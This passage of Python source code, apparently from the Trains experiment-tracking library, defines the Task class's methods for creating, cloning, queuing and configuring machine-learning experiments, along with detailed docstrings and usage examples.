super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._calling_filename = None
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Get the current running Task (experiment). This is the main execution Task (task context) returned as a Task
object.
:return: The current running Task (experiment).
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=TaskTypes.training, # type: Task.TaskTypes
reuse_last_task_id=True, # type: Union[bool, str]
continue_last_task=False, # type: Union[bool, str]
output_uri=None, # type: Optional[str]
auto_connect_arg_parser=True, # type: Union[bool, Mapping[str, bool]]
auto_connect_frameworks=True, # type: Union[bool, Mapping[str, bool]]
auto_resource_monitoring=True, # type: bool
):
# type: (...) -> Task
"""
Creates a new Task (experiment) if:
- The Task never ran before. No Task with the same ``task_name`` and ``project_name`` is stored in
**Trains Server**.
- The Task has run before (the same ``task_name`` and ``project_name``), and (a) it stored models and / or
artifacts, or (b) its status is Published, or (c) it is Archived.
- A new Task is forced by calling ``Task.init`` with ``reuse_last_task_id=False``.
Otherwise, the already initialized Task object for the same ``task_name`` and ``project_name`` is returned.
.. note::
To reference another Task, instead of initializing the same Task more than once, call
:meth:`Task.get_task`. For example, to "share" the same experiment in more than one script,
call ``Task.get_task``. See the ``Task.get_task`` method for an example.
For example:
The first time the following code runs, it will create a new Task. The status will be Completed.
.. code-block:: py
from trains import Task
task = Task.init('myProject', 'myTask')
If this code runs again, it will not create a new Task. It does not store a model or artifact,
it is not Published (its status is Completed), it was not Archived, and a new Task is not forced.
If the Task is Published or Archived, and run again, it will create a new Task with a new Task ID.
The following code will create a new Task every time it runs, because it stores an artifact.
.. code-block:: py
task = Task.init('myProject', 'myOtherTask')
d = {'a': '1'}
task.upload_artifact('myArtifact', d)
:param str project_name: The name of the project in which the experiment will be created. If the project does
not exist, it is created. If ``project_name`` is ``None``, the repository name is used. (Optional)
:param str task_name: The name of Task (experiment). If ``task_name`` is ``None``, the Python experiment
script's file name is used. (Optional)
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:param bool reuse_last_task_id: Force a new Task (experiment) with a previously used Task ID,
and the same project and Task name.
.. note::
If the previously executed Task has artifacts or models, it will not be reused (overwritten)
and a new Task will be created.
When a Task is reused, the previous execution outputs are deleted, including console outputs and logs.
The values are:
- ``True`` - Reuse the last Task ID. (default)
- ``False`` - Force a new Task (experiment).
- A string - You can also specify a Task ID (string) to be reused,
instead of the cached ID based on the project/name combination.
:param bool continue_last_task: Continue the execution of a previously executed Task (experiment)
.. note::
When continuing the execution of a previously executed Task,
all previous artifacts / models / logs are intact.
New logs will continue iteration/step based on the previous-execution maximum iteration value.
For example:
The last train/loss scalar reported was iteration 100, the next report will be iteration 101.
The values are:
- ``True`` - Continue the last Task ID.
specified explicitly by reuse_last_task_id or implicitly with the same logic as reuse_last_task_id
- ``False`` - Overwrite the execution of previous Task (default).
- A string - You can also specify a Task ID (string) to be continued.
This is equivalent to `continue_last_task=True` and `reuse_last_task_id=a_task_id_string`.
:param str output_uri: The default location for output models and other artifacts. In the default location,
Trains creates a subfolder for the output. The subfolder structure is the following:
<output destination name> / <project name> / <task name>.<Task ID>
The following are examples of ``output_uri`` values for the supported locations:
- A shared folder: ``/mnt/share/folder``
- S3: ``s3://bucket/folder``
- Google Cloud Storage: ``gs://bucket-name/folder``
- Azure Storage: ``azure://company.blob.core.windows.net/folder/``
.. important::
For cloud storage, you must install the **Trains** package for your cloud storage type,
and then configure your storage credentials. For detailed information, see
`Trains Python Client Extras <./references/trains_extras_storage/>`_ in the "Trains Python Client
Reference" section.
:param auto_connect_arg_parser: Automatically connect an argparse object to the Task?
The values are:
- ``True`` - Automatically connect. (default)
- ``False`` - Do not automatically connect.
- A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of connected
arguments. The dictionary keys are argparse variable names and the values are booleans.
The ``False`` value excludes the specified argument from the Task's parameter section.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_arg_parser={'do_not_include_me': False, }
.. note::
To manually connect an argparse, use :meth:`Task.connect`.
:param auto_connect_frameworks: Automatically connect frameworks? This includes patching MatplotLib, XGBoost,
scikit-learn, Keras callbacks, and TensorBoard/X to serialize plots, graphs, and the model location to
the **Trains Server** (backend), in addition to original output destination.
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of connected
frameworks. The dictionary keys are frameworks and the values are booleans.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_frameworks={'matplotlib': True, 'tensorflow': True, 'pytorch': True,
'xgboost': True, 'scikit': True}
:param bool auto_resource_monitoring: Automatically create machine resource monitoring plots?
These plots appear in the **Trains Web-App (UI)**, **RESULTS** tab, **SCALARS** sub-tab,
with a title of **:resource monitor:**.
The values are:
- ``True`` - Automatically create resource monitoring plots. (default)
- ``False`` - Do not automatically create.
:return: The main execution Task (Task context).
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
logger = cls.__main_task.get_logger()
logger.set_flush_period(None)
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task._reporter = None
cls.__main_task.get_logger()
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
# noinspection PyProtectedMember
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
# TODO: Check if the signal handler method is safe enough, for the time being, do not unhook
# cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
is_sub_process_task_id = None
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows platform, all others support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub()
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
if task_type not in Task.TaskTypes.__members__:
raise ValueError("Task type '{}' not supported, options are: {}".format(
task_type, Task.TaskTypes.__members__.keys()))
task_type = Task.TaskTypes.__members__[str(task_type)]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
default_project_name=project_name,
default_task_name=task_name,
default_task_type=task_type,
reuse_last_task_id=reuse_last_task_id,
continue_last_task=continue_last_task,
detect_repo=False if (
isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True
)
# set defaults
if output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
# make sure we are started
task.started(ignore_errors=True)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# patch OS forking
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('scikit', True):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('fastai', True):
PatchFastai.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
task._resource_monitor = ResourceMonitor(
task, report_mem_used_per_process=not config.get(
'development.worker.report_global_mem_used', False))
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# set excluded arguments
if isinstance(auto_connect_arg_parser, dict):
task._arguments.exclude_parser_args(auto_connect_arg_parser)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
for parser, parsed_args in get_argparser_last_args():
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# actually we have nothing to do; in remote running the argparser will ignore
# all non-argparser parameters. The only caveat is a parameter connected with the same name
# as an argparser argument; this will be solved once sections are introduced to parameters
pass
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task.get_logger()
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
logger.report_text(
'TRAINS results page: {}'.format(task.get_output_log_web_page()),
)
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
@classmethod
def create(cls, project_name=None, task_name=None, task_type=TaskTypes.training):
# type: (Optional[str], Optional[str], Task.TaskTypes) -> Task
"""
Create a new, non-reproducible Task (experiment). This is called a sub-task.
.. note::
This method always creates a new, non-reproducible Task. To create a reproducible Task, call the
:meth:`Task.init` method. To reference another Task, call the :meth:`Task.get_task` method.
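For example (a minimal sketch, the project and task names are illustrative):
.. code-block:: py
sub_task = Task.create(project_name='myProject', task_name='data preprocessing')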
:param str project_name: The name of the project in which the experiment will be created.
If ``project_name`` is ``None``, and the main execution Task is initialized (see :meth:`Task.init`),
then the main execution Task's project is used. Otherwise, if the project does
not exist, it is created. (Optional)
:param str task_name: The name of Task (experiment).
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:return: A new experiment.
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def get_task(cls, task_id=None, project_name=None, task_name=None):
# type: (Optional[str], Optional[str], Optional[str]) -> Task
"""
Get a Task by Id, or project name / task name combination.
For example:
The following code demonstrates calling ``Task.get_task`` to report a scalar to another Task. The output
of :meth:`.Logger.report_scalar` from testing is associated with the Task named ``training``. It allows
training and testing to run concurrently, because they initialized different Tasks (see :meth:`Task.init`
for information about initializing Tasks).
The training script:
.. code-block:: py
# initialize the training Task
task = Task.init('myProject', 'training')
# do some training
The testing script:
.. code-block:: py
# initialize the testing Task
task = Task.init('myProject', 'testing')
# get the training Task
train_task = Task.get_task(project_name='myProject', task_name='training')
# report metrics in the training Task
for x in range(10):
train_task.get_logger().report_scalar('title', 'series', value=x * 2, iteration=x)
:param str task_id: The Id (system UUID) of the experiment to get.
If specified, ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Task to get.
:param str task_name: The name of the Task within ``project_name`` to get.
:return: The Task specified by ID, or project name / experiment name combination.
"""
return cls.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@classmethod
def get_tasks(cls, task_ids=None, project_name=None, task_name=None, task_filter=None):
# type: (Optional[Sequence[str]], Optional[str], Optional[str], Optional[Dict]) -> Sequence[Task]
"""
Get a list of Tasks by one of the following:
- A list of specific Task IDs.
- All Tasks in a project matching a full or partial Task name.
- All Tasks in any project matching a full or partial Task name.
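For example (a minimal sketch, the project and task names are illustrative):
.. code-block:: py
tasks = Task.get_tasks(project_name='myProject', task_name='training')
for t in tasks:
    print(t.id, t.name)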
:param list(str) task_ids: The Ids (system UUID) of experiments to get.
If ``task_ids`` specified, then ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Tasks to get. To get the experiment
in all projects, use the default value of ``None``. (Optional)
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
If ``task_name`` is ``None``, all Tasks within the project are returned.
This method supports regular expressions for name matching. (Optional)
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
:return: The Tasks specified by the parameter combinations (see the parameters).
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name,
task_name=task_name, **(task_filter or {}))
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (str) -> None
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/trains.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
A read-only dictionary of Task artifacts (name, artifact).
:return: The artifacts.
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Read-only dictionary of the Task's loaded/stored models
:return: A dictionary of models loaded/stored {'input': list(Model), 'output': list(Model)}.
"""
return self.get_models()
@classmethod
def clone(
cls,
source_task=None, # type: Optional[Union[Task, str]]
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
):
# type: (...) -> Task
"""
Create a duplicate (a clone) of a Task (experiment). The status of the cloned Task is ``Draft``
and modifiable.
Use this method to manage experiments and for autoML.
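For example (a minimal sketch, the names are illustrative):
.. code-block:: py
base_task = Task.get_task(project_name='myProject', task_name='training')
cloned_task = Task.clone(source_task=base_task, name='training clone')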
:param str source_task: The Task to clone. Specify a Task object or a Task ID. (Optional)
:param str name: The name of the new cloned Task. (Optional)
:param str comment: A comment / description for the new cloned Task. (Optional)
:param str parent: The Id of the parent Task of the new Task.
- If ``parent`` is not specified, then ``parent`` is set to ``source_task.parent``.
- If ``parent`` is not specified and ``source_task.parent`` is not available, then
``parent`` is set to ``source_task``.
:param str project: The Id of the project in which to create the new Task.
If ``None``, the new task inherits the original Task's project. (Optional)
:return: The new cloned Task (experiment).
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Union[Task, str], Optional[str], Optional[str]) -> Any
"""
Enqueue a Task for execution, by adding it to an execution queue.
.. note::
A worker daemon must be listening at the queue for the worker to fetch the Task and execute it,
see `Use Case Examples <../trains_agent_ref/#use-case-examples>`_ on the "Trains Agent
Reference" page.
:param Task/str task: The Task to enqueue. Specify a Task object or Task ID.
:param str queue_name: The name of the queue. If not specified, then ``queue_id`` must be specified.
:param str queue_id: The Id of the queue. If not specified, then ``queue_name`` must be specified.
:return: An enqueue JSON response.
.. code-block:: javascript
{
"queued": 1,
"updated": 1,
"fields": {
"status": "queued",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T15:05:35.426770+00:00",
"last_update": "2020-02-24T15:05:35.426770+00:00",
"execution.queue": "2bd96ab2d9e54b578cc2fb195e52c7cf"
}
}
- ``queued`` - The number of Tasks enqueued (an integer or ``null``).
- ``updated`` - The number of Tasks updated (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time (ISO 8601 format).
- ``last_update`` - The last Task update time, including Task creation, update, change, or events for
this task (ISO 8601 format).
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
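For example (a minimal sketch, the queue name is illustrative):
.. code-block:: py
task_to_run = Task.get_task(project_name='myProject', task_name='training')
Task.enqueue(task_to_run, queue_name='default')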
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
# make sure we have either a queue name or a queue id
mutually_exclusive(queue_name=queue_name, queue_id=queue_id)
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
req = queues.GetAllRequest(name=exact_match_regex(queue_name), only_fields=["id"])
res = cls._send(session=session, req=req)
if not res.response.queues:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
queue_id = res.response.queues[0].id
if len(res.response.queues) > 1:
LoggerRoot.get_base_logger().info("Multiple queues with name={}, selecting queue id={}".format(
queue_name, queue_id))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) a Task from an execution queue.
:param Task/str task: The Task to dequeue. Specify a Task object or Task ID.
:return: A dequeue JSON response.
.. code-block:: javascript
{
"dequeued": 1,
"updated": 1,
"fields": {
"status": "created",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T16:43:43.057320+00:00",
"last_update": "2020-02-24T16:43:43.057320+00:00",
"execution.queue": null
}
}
- ``dequeued`` - The number of Tasks dequeued (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time in ISO 8601 format.
- ``last_update`` - The last time the Task was created, updated,
changed or events for this task were reported.
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
- ``updated`` - The number of Tasks updated (an integer or ``null``).
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add Tags to this task. Old tags are not deleted. When executing a Task (experiment) remotely,
this method has no effect.
:param tags: A list of tags which describe the Task to add.
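For example (the tag values are illustrative):
.. code-block:: py
task.add_tags(['baseline', 'lr-sweep'])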
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
# type: (Any) -> Any
"""
Connect an object to a Task object. This connects an experiment component (part of an experiment) to the
experiment. For example, connect hyperparameters or models.
:param object mutable: The experiment component to connect. The object can be any object Task supports
integrating, including:
- argparse - An argparse object for parameters.
- dict - A dictionary for parameters.
- TaskParameters - A TaskParameters object.
- model - A model object for initial model warmup, or for model update/snapshot uploading.
:return: The result returned when connecting the object, if supported.
:raise: Raise an exception on unsupported objects.
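For example (a minimal sketch, the parameter names are illustrative):
.. code-block:: py
params = {'batch_size': 64, 'learning_rate': 0.001}
params = task.connect(params)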
"""
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
)
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration):
# type: (Union[Mapping, Path, str]) -> Union[Mapping, Path, str]
"""
Connect a configuration dictionary or configuration file (pathlib.Path / str) to a Task object.
This method should be called before reading the configuration file.
Later, when creating an output model, the model will include the contents of the configuration dictionary
or file.
For example, a local file:
.. code-block:: py
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
A parameter dictionary:
.. code-block:: py
my_params = task.connect_configuration(my_params)
:param configuration: The configuration. This is usually the configuration used in the model training process.
Specify one of the following:
- A dictionary - A dictionary containing the configuration. Trains stores the configuration in
the **Trains Server** (backend), in a HOCON format (JSON-like format) which is editable.
- A ``pathlib2.Path`` string - A path to the configuration file. Trains stores the content of the file.
A local path must be a relative path. When executing a Task remotely in a worker, the contents brought
from the **Trains Server** (backend) overwrites the contents of the file.
:return: If a dictionary is specified, then a dictionary is returned. If pathlib2.Path / string is
specified, then a path to a local configuration file is returned.
"""
if not isinstance(configuration, (dict, Path, six.string_types)):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
# parameter dictionary
if isinstance(configuration, dict):
def _update_config_dict(task, config_dict):
# noinspection PyProtectedMember
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not self.is_main_task():
self._set_model_config(config_dict=configuration)
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
configuration.clear()
configuration.update(self._get_model_config_dict())
configuration = ProxyDictPreWrite(False, False, **configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not self.is_main_task():
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_model_config_text()
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='trains_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary to a Task (experiment) object.
Later, when creating an output model, the model will include the label enumeration dictionary.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
:return: The label enumeration dictionary (JSON).
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not self.is_main_task():
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**Trains Web-App (UI)**.
:return: The Logger for the Task (experiment).
"""
return self._get_logger()
def mark_started(self, force=False):
# type: (bool) -> ()
"""
Manually mark a Task as started (happens automatically)
:param bool force: If True the task status will be changed to `started` regardless of the current Task state.
"""
# UI won't let us see metrics if we're not started
self.started(force=force)
self.reload()
def mark_stopped(self, force=False):
# type: (bool) -> ()
"""
Manually mark a Task as stopped (also used in :meth:`_at_exit`)
:param bool force: If True the task status will be changed to `stopped` regardless of the current Task state.
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped(force=force)
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs.
:param bool wait_for_uploads: Wait for all outstanding uploads to complete before exiting the flush?
- ``True`` - Wait
- ``False`` - Do not wait (default)
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self._reporter:
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset a Task. Trains reloads a Task after a successful reset.
When a worker executes a Task remotely, the Task does not reset unless
the ``force`` parameter is set to ``True`` (this avoids accidentally clearing logs and metrics).
:param bool set_started_on_success: If successful, automatically set the Task to started?
- ``True`` - If successful, set to started.
- ``False`` - If successful, do not set to started. (default)
:param bool force: Force a Task reset, even when executing the Task (experiment) remotely in a worker?
- ``True`` - Force
- ``False`` - Do not force (default)
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables you to manually shut down the task.
.. warning::
Only call :meth:`Task.close` if you are certain the Task is not needed.
"""
if self._at_exit_called:
return
# store is_main before we call __shutdown, because __shutdown will null it
is_main = self.is_main_task()
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
self.__shutdown()
# unregister atexit callbacks and signal hooks, if we are the main task
if is_main:
self.__register_at_exit(None)
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, pandas.DataFrame, Dict, Union[bool, Sequence[str]]) -> None
"""
Register (add) an artifact for the current Task. Registered artifacts are dynamically synchronized with the
**Trains Server** (backend). If a registered artifact is updated, the update is stored in the
**Trains Server** (backend). Registered artifacts are primarily used for data auditing.
The currently supported registered artifact object type is a pandas.DataFrame.
See also :meth:`Task.unregister_artifact` and :meth:`Task.get_registered_artifacts`.
.. note::
Trains also supports uploaded artifacts which are one-time uploads of static artifacts that are not
dynamically synchronized with the **Trains Server** (backend). These static artifacts include
additional object types. For more information, see :meth:`Task.upload_artifact`.
:param str name: The name of the artifact.
.. warning::
If an artifact with the same name was previously registered, it is overwritten.
:param object artifact: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param uniqueness_columns: A Sequence of columns for artifact uniqueness comparison criteria, or the default
value of ``True``. If ``True``, the artifact uniqueness comparison criteria is all the columns,
which is the same as ``artifact.columns``.
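For example, a minimal usage sketch (assumes ``task`` was returned by ``Task.init``; the DataFrame contents are illustrative):
.. code-block:: py
import pandas as pd
df = pd.DataFrame({'epoch': [1, 2], 'loss': [0.8, 0.5]})
task.register_artifact('train_stats', df, metadata={'stage': 'train'}, uniqueness_columns=['epoch'])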
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Unregister (remove) a registered artifact. This removes the artifact from the watch list that Trains uses
to synchronize artifacts with the **Trains Server** (backend).
.. important::
- Calling this method does not remove the artifact from a Task. It only stops Trains from
monitoring the artifact.
- When this method is called, Trains immediately takes the last snapshot of the artifact.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
